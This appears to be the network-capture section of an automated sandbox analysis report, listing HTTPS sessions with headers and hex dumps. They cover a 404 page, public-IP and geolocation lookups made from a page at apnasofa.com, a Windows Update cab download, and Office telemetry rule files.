                                                          2024-12-02 16:55:27 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                          2024-12-02 16:55:27 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                          Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449769104.26.13.2054437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:27 UTC349OUTGET /?format=json HTTP/1.1
                                                          Host: api.ipify.org
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:28 UTC430INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:55:28 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 21
                                                          Connection: close
                                                          Vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 8ebcd841597f420d-EWR
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1641&rtt_var=619&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=927&delivery_rate=1762220&cwnd=243&unsent_bytes=0&cid=785180a8de1ea7f7&ts=475&x=0"
                                                          2024-12-02 16:55:28 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                          Data Ascii: {"ip":"8.46.123.228"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.449770103.126.138.874437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:29 UTC550OUTGET /json/8.46.123.228 HTTP/1.1
                                                          Host: ipwhois.app
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://apnasofa.com
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://apnasofa.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:29 UTC255INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:55:29 GMT
                                                          Content-Type: application/json; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Server: ipwhois
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: *
                                                          X-Robots-Tag: noindex
                                                          2024-12-02 16:55:29 UTC69INData Raw: 33 61 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 79 6f 75 27 76 65 20 68 69 74 20 74 68 65 20 6d 6f 6e 74 68 6c 79 20 6c 69 6d 69 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 3a{"success":false,"message":"you've hit the monthly limit"}0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.449771103.126.138.874437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:31 UTC352OUTGET /json/8.46.123.228 HTTP/1.1
                                                          Host: ipwhois.app
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:32 UTC255INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:55:32 GMT
                                                          Content-Type: application/json; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Server: ipwhois
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: *
                                                          X-Robots-Tag: noindex
                                                          2024-12-02 16:55:32 UTC699INData Raw: 32 61 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 66 6c 61 67 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 69 70 77 68 6f 69 73 2e 69 6f 5c 2f 66 6c 61 67 73 5c 2f 75 73 2e 73 76 67 22 2c 22 63 6f 75 6e 74 72 79 5f 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 63 6f 75 6e 74 72 79 5f 70 68
                                                          Data Ascii: 2af{"ip":"8.46.123.228","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","country_flag":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","country_capital":"Washington D.C.","country_ph


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.4497724.175.87.197443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:03 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2nvR5RnwFWOGpbB&MD=eSUd7a8V HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2024-12-02 16:56:03 UTC560INHTTP/1.1 200 OK
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Content-Type: application/octet-stream
                                                          Expires: -1
                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                          MS-CorrelationId: 89796225-96aa-42bc-b96e-05393d6b04a5
                                                          MS-RequestId: 85810737-72bd-4f8d-b2d8-006cc3037288
                                                          MS-CV: oqQg3G8ohUqTk8Nh.0
                                                          X-Microsoft-SLSClientCache: 1440
                                                          Content-Disposition: attachment; filename=environment.cab
                                                          X-Content-Type-Options: nosniff
                                                          Date: Mon, 02 Dec 2024 16:56:02 GMT
                                                          Connection: close
                                                          Content-Length: 30005
                                                          2024-12-02 16:56:03 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                          2024-12-02 16:56:03 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          18192.168.2.44977313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:04 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:05 UTC471INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:04 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 218853
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public
                                                          Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                                          ETag: "0x8DD10CBC2E3B852"
                                                          x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165604Z-174f7845968vqt9xhC1EWRgten00000014pg00000000scv4
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:05 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                          Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                          Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                          Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                          Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                          Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                          Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                          2024-12-02 16:56:05 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                          Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          19192.168.2.44977713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:07 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:08 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 408
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
